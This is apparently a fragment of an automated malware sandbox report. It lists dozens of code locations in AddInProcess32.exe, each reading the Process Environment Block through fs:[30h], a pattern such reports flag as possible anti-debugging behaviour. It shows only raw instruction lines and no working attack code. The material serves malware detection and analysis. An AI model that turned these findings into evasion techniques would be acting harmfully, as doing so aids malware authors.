          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0192019F mov eax, dword ptr fs:[00000030h]5_2_0192019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0192019F mov eax, dword ptr fs:[00000030h]5_2_0192019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0195C188 mov eax, dword ptr fs:[00000030h]5_2_0195C188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0195C188 mov eax, dword ptr fs:[00000030h]5_2_0195C188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189A197 mov eax, dword ptr fs:[00000030h]5_2_0189A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189A197 mov eax, dword ptr fs:[00000030h]5_2_0189A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189A197 mov eax, dword ptr fs:[00000030h]5_2_0189A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018F7190 mov eax, dword ptr fs:[00000030h]5_2_018F7190
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019511A4 mov eax, dword ptr fs:[00000030h]5_2_019511A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019511A4 mov eax, dword ptr fs:[00000030h]5_2_019511A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019511A4 mov eax, dword ptr fs:[00000030h]5_2_019511A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019511A4 mov eax, dword ptr fs:[00000030h]5_2_019511A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018BB1B0 mov eax, dword ptr fs:[00000030h]5_2_018BB1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0191E1D0 mov eax, dword ptr fs:[00000030h]5_2_0191E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0191E1D0 mov eax, dword ptr fs:[00000030h]5_2_0191E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0191E1D0 mov ecx, dword ptr fs:[00000030h]5_2_0191E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0191E1D0 mov eax, dword ptr fs:[00000030h]5_2_0191E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0191E1D0 mov eax, dword ptr fs:[00000030h]5_2_0191E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019661C3 mov eax, dword ptr fs:[00000030h]5_2_019661C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019661C3 mov eax, dword ptr fs:[00000030h]5_2_019661C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019751CB mov eax, dword ptr fs:[00000030h]5_2_019751CB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DD1D0 mov eax, dword ptr fs:[00000030h]5_2_018DD1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DD1D0 mov ecx, dword ptr fs:[00000030h]5_2_018DD1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C51EF mov eax, dword ptr fs:[00000030h]5_2_018C51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C51EF mov eax, dword ptr fs:[00000030h]5_2_018C51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C51EF mov eax, dword ptr fs:[00000030h]5_2_018C51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C51EF mov eax, dword ptr fs:[00000030h]5_2_018C51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C51EF mov eax, dword ptr fs:[00000030h]5_2_018C51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C51EF mov eax, dword ptr fs:[00000030h]5_2_018C51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C51EF mov eax, dword ptr fs:[00000030h]5_2_018C51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C51EF mov eax, dword ptr fs:[00000030h]5_2_018C51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C51EF mov eax, dword ptr fs:[00000030h]5_2_018C51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C51EF mov eax, dword ptr fs:[00000030h]5_2_018C51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C51EF mov eax, dword ptr fs:[00000030h]5_2_018C51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C51EF mov eax, dword ptr fs:[00000030h]5_2_018C51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C51EF mov eax, dword ptr fs:[00000030h]5_2_018C51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A51ED mov eax, dword ptr fs:[00000030h]5_2_018A51ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019471F9 mov esi, dword ptr fs:[00000030h]5_2_019471F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019761E5 mov eax, dword ptr fs:[00000030h]5_2_019761E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018D01F8 mov eax, dword ptr fs:[00000030h]5_2_018D01F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01960115 mov eax, dword ptr fs:[00000030h]5_2_01960115
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0194A118 mov ecx, dword ptr fs:[00000030h]5_2_0194A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0194A118 mov eax, dword ptr fs:[00000030h]5_2_0194A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0194A118 mov eax, dword ptr fs:[00000030h]5_2_0194A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0194A118 mov eax, dword ptr fs:[00000030h]5_2_0194A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018D0124 mov eax, dword ptr fs:[00000030h]5_2_018D0124
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A1131 mov eax, dword ptr fs:[00000030h]5_2_018A1131
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A1131 mov eax, dword ptr fs:[00000030h]5_2_018A1131
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189B136 mov eax, dword ptr fs:[00000030h]5_2_0189B136
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189B136 mov eax, dword ptr fs:[00000030h]5_2_0189B136
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189B136 mov eax, dword ptr fs:[00000030h]5_2_0189B136
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189B136 mov eax, dword ptr fs:[00000030h]5_2_0189B136
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01899148 mov eax, dword ptr fs:[00000030h]5_2_01899148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01899148 mov eax, dword ptr fs:[00000030h]5_2_01899148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01899148 mov eax, dword ptr fs:[00000030h]5_2_01899148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01899148 mov eax, dword ptr fs:[00000030h]5_2_01899148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01975152 mov eax, dword ptr fs:[00000030h]5_2_01975152
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01938158 mov eax, dword ptr fs:[00000030h]5_2_01938158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01934144 mov eax, dword ptr fs:[00000030h]5_2_01934144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01934144 mov eax, dword ptr fs:[00000030h]5_2_01934144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01934144 mov ecx, dword ptr fs:[00000030h]5_2_01934144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01934144 mov eax, dword ptr fs:[00000030h]5_2_01934144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01934144 mov eax, dword ptr fs:[00000030h]5_2_01934144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A7152 mov eax, dword ptr fs:[00000030h]5_2_018A7152
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A6154 mov eax, dword ptr fs:[00000030h]5_2_018A6154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A6154 mov eax, dword ptr fs:[00000030h]5_2_018A6154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189C156 mov eax, dword ptr fs:[00000030h]5_2_0189C156
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01939179 mov eax, dword ptr fs:[00000030h]5_2_01939179
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F172 mov eax, dword ptr fs:[00000030h]5_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A208A mov eax, dword ptr fs:[00000030h]5_2_018A208A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189D08D mov eax, dword ptr fs:[00000030h]5_2_0189D08D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018D909C mov eax, dword ptr fs:[00000030h]5_2_018D909C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A5096 mov eax, dword ptr fs:[00000030h]5_2_018A5096
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CD090 mov eax, dword ptr fs:[00000030h]5_2_018CD090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CD090 mov eax, dword ptr fs:[00000030h]5_2_018CD090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019660B8 mov eax, dword ptr fs:[00000030h]5_2_019660B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019660B8 mov ecx, dword ptr fs:[00000030h]5_2_019660B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B70C0 mov eax, dword ptr fs:[00000030h]5_2_018B70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B70C0 mov ecx, dword ptr fs:[00000030h]5_2_018B70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B70C0 mov ecx, dword ptr fs:[00000030h]5_2_018B70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B70C0 mov eax, dword ptr fs:[00000030h]5_2_018B70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B70C0 mov ecx, dword ptr fs:[00000030h]5_2_018B70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B70C0 mov ecx, dword ptr fs:[00000030h]5_2_018B70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B70C0 mov eax, dword ptr fs:[00000030h]5_2_018B70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B70C0 mov eax, dword ptr fs:[00000030h]5_2_018B70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B70C0 mov eax, dword ptr fs:[00000030h]5_2_018B70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B70C0 mov eax, dword ptr fs:[00000030h]5_2_018B70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B70C0 mov eax, dword ptr fs:[00000030h]5_2_018B70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B70C0 mov eax, dword ptr fs:[00000030h]5_2_018B70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B70C0 mov eax, dword ptr fs:[00000030h]5_2_018B70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B70C0 mov eax, dword ptr fs:[00000030h]5_2_018B70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B70C0 mov eax, dword ptr fs:[00000030h]5_2_018B70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B70C0 mov eax, dword ptr fs:[00000030h]5_2_018B70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B70C0 mov eax, dword ptr fs:[00000030h]5_2_018B70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B70C0 mov eax, dword ptr fs:[00000030h]5_2_018B70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019220DE mov eax, dword ptr fs:[00000030h]5_2_019220DE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019750D9 mov eax, dword ptr fs:[00000030h]5_2_019750D9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0191D0C0 mov eax, dword ptr fs:[00000030h]5_2_0191D0C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0191D0C0 mov eax, dword ptr fs:[00000030h]5_2_0191D0C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C90DB mov eax, dword ptr fs:[00000030h]5_2_018C90DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A80E9 mov eax, dword ptr fs:[00000030h]5_2_018A80E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C50E4 mov eax, dword ptr fs:[00000030h]5_2_018C50E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C50E4 mov ecx, dword ptr fs:[00000030h]5_2_018C50E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0189A0E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019260E0 mov eax, dword ptr fs:[00000030h]5_2_019260E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189C0F0 mov eax, dword ptr fs:[00000030h]5_2_0189C0F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E20F0 mov ecx, dword ptr fs:[00000030h]5_2_018E20F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01924000 mov ecx, dword ptr fs:[00000030h]5_2_01924000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018BE016 mov eax, dword ptr fs:[00000030h]5_2_018BE016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018BE016 mov eax, dword ptr fs:[00000030h]5_2_018BE016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018BE016 mov eax, dword ptr fs:[00000030h]5_2_018BE016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018BE016 mov eax, dword ptr fs:[00000030h]5_2_018BE016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0196903E mov eax, dword ptr fs:[00000030h]5_2_0196903E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0196903E mov eax, dword ptr fs:[00000030h]5_2_0196903E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0196903E mov eax, dword ptr fs:[00000030h]5_2_0196903E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0196903E mov eax, dword ptr fs:[00000030h]5_2_0196903E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189A020 mov eax, dword ptr fs:[00000030h]5_2_0189A020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189C020 mov eax, dword ptr fs:[00000030h]5_2_0189C020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01926050 mov eax, dword ptr fs:[00000030h]5_2_01926050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0194705E mov ebx, dword ptr fs:[00000030h]5_2_0194705E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0194705E mov eax, dword ptr fs:[00000030h]5_2_0194705E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A2050 mov eax, dword ptr fs:[00000030h]5_2_018A2050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CB052 mov eax, dword ptr fs:[00000030h]5_2_018CB052
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0191D070 mov ecx, dword ptr fs:[00000030h]5_2_0191D070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01975060 mov eax, dword ptr fs:[00000030h]5_2_01975060
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B1070 mov eax, dword ptr fs:[00000030h]5_2_018B1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B1070 mov ecx, dword ptr fs:[00000030h]5_2_018B1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B1070 mov eax, dword ptr fs:[00000030h]5_2_018B1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B1070 mov eax, dword ptr fs:[00000030h]5_2_018B1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B1070 mov eax, dword ptr fs:[00000030h]5_2_018B1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B1070 mov eax, dword ptr fs:[00000030h]5_2_018B1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B1070 mov eax, dword ptr fs:[00000030h]5_2_018B1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B1070 mov eax, dword ptr fs:[00000030h]5_2_018B1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B1070 mov eax, dword ptr fs:[00000030h]5_2_018B1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B1070 mov eax, dword ptr fs:[00000030h]5_2_018B1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B1070 mov eax, dword ptr fs:[00000030h]5_2_018B1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B1070 mov eax, dword ptr fs:[00000030h]5_2_018B1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B1070 mov eax, dword ptr fs:[00000030h]5_2_018B1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0192106E mov eax, dword ptr fs:[00000030h]5_2_0192106E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CC073 mov eax, dword ptr fs:[00000030h]5_2_018CC073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189E388 mov eax, dword ptr fs:[00000030h]5_2_0189E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189E388 mov eax, dword ptr fs:[00000030h]5_2_0189E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189E388 mov eax, dword ptr fs:[00000030h]5_2_0189E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C438F mov eax, dword ptr fs:[00000030h]5_2_018C438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C438F mov eax, dword ptr fs:[00000030h]5_2_018C438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0197539D mov eax, dword ptr fs:[00000030h]5_2_0197539D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018F739A mov eax, dword ptr fs:[00000030h]5_2_018F739A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018F739A mov eax, dword ptr fs:[00000030h]5_2_018F739A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01898397 mov eax, dword ptr fs:[00000030h]5_2_01898397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01898397 mov eax, dword ptr fs:[00000030h]5_2_01898397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01898397 mov eax, dword ptr fs:[00000030h]5_2_01898397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C33A5 mov eax, dword ptr fs:[00000030h]5_2_018C33A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018D33A0 mov eax, dword ptr fs:[00000030h]5_2_018D33A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018D33A0 mov eax, dword ptr fs:[00000030h]5_2_018D33A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0195B3D0 mov ecx, dword ptr fs:[00000030h]5_2_0195B3D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018AA3C0 mov eax, dword ptr fs:[00000030h]5_2_018AA3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018AA3C0 mov eax, dword ptr fs:[00000030h]5_2_018AA3C0
